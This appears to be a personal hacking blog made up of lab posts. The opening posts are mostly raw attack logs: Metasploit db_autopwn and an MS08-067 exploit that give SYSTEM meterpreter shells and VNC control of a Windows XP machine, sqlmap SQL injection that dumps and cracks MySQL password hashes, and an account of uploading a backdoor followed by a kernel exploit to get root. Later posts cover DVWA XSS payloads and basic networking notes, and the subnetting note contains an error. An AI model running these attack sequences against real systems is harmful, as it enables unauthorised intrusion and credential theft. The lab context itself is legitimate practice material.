Uncl3 Blog's

Play Metasploit db_autopwn on Windows XP SP2 "Abal-Abal"

Manusia Tak Sempurna

msf > db_status
[*] postgresql connected to msf3
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------

msf > db_nmap 192.168.56.101
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-09-30 07:49 WIT
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 3389/tcp open ms-term-serv
[*] Nmap: MAC Address: 08:00:27:2B:15:80 (Cadmus Computer Systems)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.56.101 08:00:27:2B:15:80

msf > db_autopwn -p -t -e
[*] Analysis completed in 8 seconds (0 vulns / 0 refs)
[*]
[*] =========================================================================
[*] Matching Exploit Modules
[*] =========================================================================
[*] 192.168.56.101:135 exploit/windows/dcerpc/ms03_026_dcom (port match)
[*] 192.168.56.101:139 exploit/freebsd/samba/trans2open (port match)
[*] 192.168.56.101:139 exploit/linux/samba/chain_reply (port match)
[*] 192.168.56.101:139 exploit/linux/samba/lsa_transnames_heap (port match)
[*] 192.168.56.101:139 exploit/linux/samba/trans2open (port match)
[*] 192.168.56.101:139 exploit/multi/samba/nttrans (port match)
[*] 192.168.56.101:139 exploit/multi/samba/usermap_script (port match)
[*] 192.168.56.101:139 exploit/netware/smb/lsass_cifs (port match)
[*] 192.168.56.101:139 exploit/osx/samba/lsa_transnames_heap (port match)
[*] 192.168.56.101:139 exploit/solaris/samba/trans2open (port match)
[*] 192.168.56.101:139 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.56.101:139 exploit/windows/brightstor/etrust_itm_alert (port match)
[*] 192.168.56.101:139 exploit/windows/smb/ms03_049_netapi (port match)
[*] 192.168.56.101:139 exploit/windows/smb/ms04_011_lsass (port match)
[*] 192.168.56.101:139 exploit/windows/smb/ms04_031_netdde (port match)
----------------------------------cut here------------------------------------------
(1/51 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.56.101:135...
[*] (2/51 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.56.101:139...
[*] (3/51 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.56.101:139...
[*] (4/51 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.56.101:139...
[*] (5/51 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.56.101:139...
[*] (6/51 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.56.101:139...
[*] (7/51 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.56.101:139...
[*] (8/51 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.56.101:139...
[*] (9/51 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.56.101:139...
[*] (10/51 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.56.101:139...
[*] (11/51 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.56.101:139...
[*] (12/51 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.56.101:139...
[*] (13/51 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.56.101:139...
[*] (14/51 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.56.101:139...
[*] (15/51 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.56.101:139...
[*] (16/51 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.56.101:139...
[*] (17/51 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.56.101:139...
[*] (18/51 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.56.101:139...
[*] (19/51 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.56.101:139...
[*] (20/51 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.56.101:139...
[*] (21/51 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.56.101:139...
[*] (22/51 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.56.101:139...
[*] (23/51 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.56.101:139...
[*] (24/51 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.56.101:139...
[*] (25/51 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.56.101:139...
[*] (26/51 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.56.101:139...
----------------------------------cut here------------------------------------------
(49/51 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.56.101:445...
[*] (50/51 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.56.101:445...
[*] (51/51 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.56.101:445...
[*] (51/51 [0 sessions]): Waiting on 38 launched modules to finish execution...
[*] (51/51 [0 sessions]): Waiting on 25 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.56.1:49973 -> 192.168.56.101:20907) at 2011-09-30 07:51:35 +0700
[*] (51/51 [1 sessions]): Waiting on 11 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.56.1:58149 -> 192.168.56.101:33496) at 2011-09-30 07:51:37 +0700
[*] (51/51 [2 sessions]): Waiting on 7 launched modules to finish execution...
[*] (51/51 [2 sessions]): Waiting on 6 launched modules to finish execution...

Active sessions
===============

Id Type Information Connection Via
-- ---- ----------- ---------- ---
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ SADAHIKE 192.168.56.1:49973 -> 192.168.56.101:20907 exploit/windows/smb/ms08_067_netapi
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ SADAHIKE 192.168.56.1:58149 -> 192.168.56.101:33496 exploit/windows/smb/ms08_067_netapi

[*] =========================================================================
msf > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1952 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

do whatever you want!!!

OR TRY THIS
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/vncinject/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy

Exploit target:

Id Name
-- ----
0 Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 3 created in the background.

VNC Viewer Free Edition 4.1.1 for X - built Apr 9 2010 15:52:37
Copyright (C) 2002-2005 RealVNC Ltd.
See http://www.realvnc.com for information on VNC.
msf exploit(ms08_067_netapi) >
Fri Sep 30 08:14:30 2011
CConn: connected to host 127.0.0.1 port 5900

Fri Sep 30 08:14:31 2011
CConnection: Server supports RFB protocol version 3.8
CConnection: Using RFB protocol version 3.8
TXImage: Using default colormap and visual, TrueColor, depth 24.
CConn: Using pixel format depth 6 (8bpp) rgb222
CConn: Using ZRLE encoding
CConn: Throughput 3781 kbit/s - changing to hextile encoding
CConn: Throughput 3781 kbit/s - changing to full colour
CConn: Using pixel format depth 24 (32bpp) little-endian rgb888
CConn: Using hextile encoding

Fri Sep 30 08:14:32 2011
CConn: Throughput 20000 kbit/s - changing to raw encoding
CConn: Using raw encoding

now you can control the windows on your on.....:p

0 comments | |

Create Backdoor From MySQL

Manusia Tak Sempurna

I scan with sqlmap and this is the syntax

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" --dbs --level=5 --risk=3
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:36:50

[22:36:51] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:36:51] [INFO] testing connection to the target url
[22:36:51] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---
[22:36:51] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:36:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:36:58] [INFO] fetching database names
[22:36:58] [INFO] fetching number of databases
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 9
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': information_schema
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': Joomla
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': dvwa
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': mysql
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': phpmyadmin
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': test
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku3
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': wordpress
available databases [9]:
[*] dvwa
[*] information_schema
[*] Joomla
[*] mysql
[*] phpmyadmin
[*] test
[*] webku
[*] webku3
[*] wordpress

[22:36:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at: 22:36:58

and the I try to search for a username and password from the database with sqlmap

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --password --level=5 --risk=3

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:37:51

[22:37:52] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:37:52] [INFO] testing connection to the target url
[22:37:52] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---

[22:37:52] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:37:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:37:54] [INFO] fetching database users password hashes
[22:37:54] [INFO] fetching database users
[22:37:54] [INFO] fetching number of database users
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 5
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'pakdhe-laptop'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'127.0.0.1'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'debian-sys-maint'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'phpmyadmin'@'localhost'
[22:37:54] [INFO] fetching number of password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 2
[22:37:54] [INFO] fetching password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[22:37:54] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *896747F40953077D8AB58F8A3002427D8DC256FE
[22:37:54] [INFO] fetching number of password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[22:37:57] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[22:37:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[22:38:02] [INFO] starting dictionary attack (mysql_passwd)
[22:38:04] [INFO] found: 'root' for user: 'root'
[22:38:05] [INFO] found: 'root' for user: 'phpmyadmin'
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *896747F40953077D8AB58F8A3002427D8DC256FE
[*] phpmyadmin [1]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
clear-text password: root
[*] root [2]:
password hash: *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
clear-text password: root

[22:39:55] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at: 22:39:55

Then I try to connect from sqlmap tp to the shell of mysql

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --sql-shell --level=5 --risk=3

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 08:27:56

[08:27:56] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:27:56] [INFO] testing connection to the target url
[08:27:56] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---

[08:27:56] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 1
[08:27:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[08:27:59] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> show databases;
do you want to retrieve the SQL statement output? [Y/n/a] y
[08:28:18] [INFO] fetching SQL SELECT statement query output: 'show databases;'
[08:28:18] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[08:28:18] [INFO] retrieved:
sql-shell>

But seems it can't connect

to be continued................

0 comments | |

Server Exploit

Manusia Tak Sempurna

To exploit a server I use scanner to know the aplication running on the system, after I scan i got the result but the aplication is the latest version show I can break the system over the aplication.

Then I just exploring the web menu to menu on the web. I find a vulner on the upload file on the web. I just test to upload some picture to the web and it success, i try try to upload some file with extension .txt and it success to. Maybe the developer web is not sanitaze the file can be upload.

Then I just upload a backdoor that I have prepared, I just upload the backdoor to the web and it succesfully uploaded. Now i search where the file has been upload and i found it. After i running the backdoor i try to exploit the kernel on the system. I search the exploit kernel and i found it I just upload the exploit kernel under the backdoor on the web.

After that i just run the exploit on the kernel to gained the full access as root and it is work. Now I have full access to the system.

0 comments | |

SOCKS

Manusia Tak Sempurna

SOCKS is a network protocol designed to allow clients to communicate with Internet servers through firewalls. SOCKS is typically implemented on proxy servers. It is supported as a proxy configuration option in popular Web browsers and instant messaging programs. SOCKS can also be found in some VPN implementations.

Multiple versions of the SOCKS protocol exist including SOCKS v4 and SOCKS v5. SOCKS v4 uses TCP as a transport, while SOCKS v5 also supports UDP. The base SOCKS v5 specification is RFC 1928 with additional details captured in RFC 1929 and RFC 1961.

reference :

http://compnetworking.about.com/od/networkprotocols/g/bldef_socks.htm

0 comments | |

htaccess

Manusia Tak Sempurna

htaccess file is an ASCII text file located in the root directory is usually "public_html" isoften used to change the default settings of the web server used.
htaccess can be use to
- blocking specific ip address
- redirect old pages to the new pages
- preventing exploration to the directory

0 comments | |

PHP Suhosin

Manusia Tak Sempurna

Suhosin is an advanced protection system for PHP installations. It was designed to protect servers and users from known and unknown flaws in PHP applications and the PHP core. Suhosin comes in two independent parts, that can be used separately or in combination. The first part is a small patch against the PHP core, that implements a few low-level protections against bufferoverflows or format string vulnerabilities and the second part is a powerful PHP extension that implements all the other protections.

Feature List
Engine Protection (only with patch)

Protects the internal memory manager against bufferoverflows with Canary and SafeUnlink Protection
Protects Destructors of Zend Hashtables
Protects Destructors of Zend Linked-Lists
Protects the PHP core and extensions against format string vulnerabilities
Protects against errors in certain libc realpath() implementations

Misc Features

Protection Simulation mode
Adds the functions sha256() and sha256_file() to the PHP core
Adds support for CRYPT_BLOWFISH to crypt() on all platforms
Transparent protection of open phpinfo() pages
EXPERIMENTAL SQL database user protection

Runtime Protection

Transparent Cookie Encryption
Protects against different kinds of (Remote-)Include Vulnerabilities
disallows Remote URL inclusion (optional: black-/whitelisting), disallows inclusiong of uploaded files, optionally stops directory traversal attacks
Allows disabling the preg_replace() /e modifier
Allows disabling eval()
Protects against infinite recursion through a configureabel maximum execution depth
Supports per Virtual Host / Directory configureable function black- and whitelists
Supports a separated function black- and whitelist for evaluated code
Protects against HTTP Response Splitting Vulnerabilities
Protects against scripts manipulating the memory_limit
Protects PHP‘s superglobals against extract() and import_request_vars()
Adds protection against newline attacks to mail()
Adds protection against \0 attack on preg_replace()

Session Protection

Transparent encryption of session data
Transparent session hijacking protection
Protection against overlong session identifiers
Protection against malicious chars in session identifiers

Filtering Features

Filters ASCIIZ characters from user input
Ignores GET, POST, COOKIE variables with the following names:

GLOBALS, _COOKIE, _ENV, _FILES, _GET, _POST, _REQUEST
_SERVER, _SESSION, HTTP_COOKIE_VARS, HTTP_ENV_VARS
HTTP_GET_VARS, HTTP_POST_VARS, HTTP_POST_FILES
HTTP_RAW_POST_DATA, HTTP_SERVER_VARS, HTTP_SESSION_VARS

Allows enforcing limits on REQUEST variables or separated by type (GET, POST, COOKIE)

Supports a number of variables per request limit
Supports a maximum length of variable names [with and without indicies]
Supports a maximum length of array indicies
Supports a maximum length of variable values
Supports a maximum depth of arrays

Allows only a configureable number of uploaded files
Supports verification of uploaded files through an external script
Supports automatic banning of uploaded ELF executables
Supports automatic banning of uploaded binary files
Supports automatic stripping of binary content in uploaded files
Configureable action on violation

just block violating variables
send HTTP response code
redirect the browser
execute another PHP script

Logging Features

Supports multiple log devices (syslog, SAPI module error log, external logging script)
Supports freely configureable syslog facility and priority
Supports log device separated selection of alert types to log
Alerts contain filename and linenumber that triggered it
Alerts contain the IP address of the user triggering it
The IP Address can also be extracted from X-Forwarded-For HTTP headers (f.e. for reverse proxy setups)

0 comments | |

Subnetting

Manusia Tak Sempurna

Subnetting is 32 bit binary numbers it can use to differentiate betwen network ID and host ID. It can be represent the location host, on local network or external network.

We often see in writing the ip address/computer addressing as follows 192.168.0.1/24.

/ 24 indicatesthat the network connection is divided into 256 or 254 client computers with an id and a host,subnet mask is 255.255.255.0 for this group and in this workgroup can be formed onlyone group that is only a start xxx.xxx.xxx.0 - xxx.xxx.xxx.256.

0 comments | |

Bypass Client Side JS

Manusia Tak Sempurna

CASE

This website performs both client and server side validation. For this exercise, your job is to break the client side validation and send the website input that it wasn't expecting. You must break all 7 validators at the same time.

picture

I try to input

picture

but it seems not succes it just make appear pop up

picture

so I try with burpsuite to change the variable on the box

picture

box 1

I just add ABC

box 2

I just add 456

box 3

I just add !@#

box 4

I just add 7

box 5

I just add 12345

box 6

I just add 1234567

box 7

I just add 9876

after I change the variable on the box then it's work. It can bypass on the client side.

picture

0 comments | |

Install WebGoat

Manusia Tak Sempurna

Before we install WebGoat we need java you can download it in here
and if you want to download WebGoat you can download in here
After that you can extract the file with terminal

p7zip -d WebGoat-OWASP_Standard-5.3_RC1.7z

if you don't have p7zip you can download from terminal

apt-get install p7zip

Then if you want to make your dekstop clean you can move it inside /pentest/web/webgoat you can do it form terminal

mkdir /pentest/web/webgoat
mv WebGoat-5.3_RC1/* /pentest/web/webgoat

now make /pentest/web/webgoat/webgoat.sh executable with

chmod +x /pentest/web/webgoat/webgoat.sh

Now you can run webgoat on port 80 or 8080 running

sh /pentest/web/webgoat/webgoat.sh start80 or sh /pentest/web/webgoat/webgoat.sh start8080

and to stop tomcat and webgoat use

sh /pentest/web/webgoat/webgoat.sh stop

Open up firefox and connect to http://127.0.0.1/webgoat/attack or http://127.0.0.1:8080/webgoat/attack according to the port you use to run tomcat.

username : guest
password : guest

after that you can use WebGoat

0 comments | |

Damn Vulnerable Web App (DVWA)

Manusia Tak Sempurna

DVWA is to practice or learn the vulnerablity web. In this application include :
Brute Force
Command Execution
CSRF
File Inclusion
SQL Injection
SQL Injection Blind
Upload
XSS Reflected
XSS Stored

XSS Reflected
I just try to XSS level low with this script :
<script>alert("XSS LOW")</script>
and the result is like in this picture

And then the next level is medium
In this level I just try with this script
<script language=javascript>alert("XSS Medium");</script>
and the result is like in the picture

The next level is high level
On this level I can't get the right script so I can't solved this level

Labels: DVWA 1 comments | |

About Me

Labels

Blog Archive

Nine Tail's Blog

LinkedIn

Viewer's

Search

Followers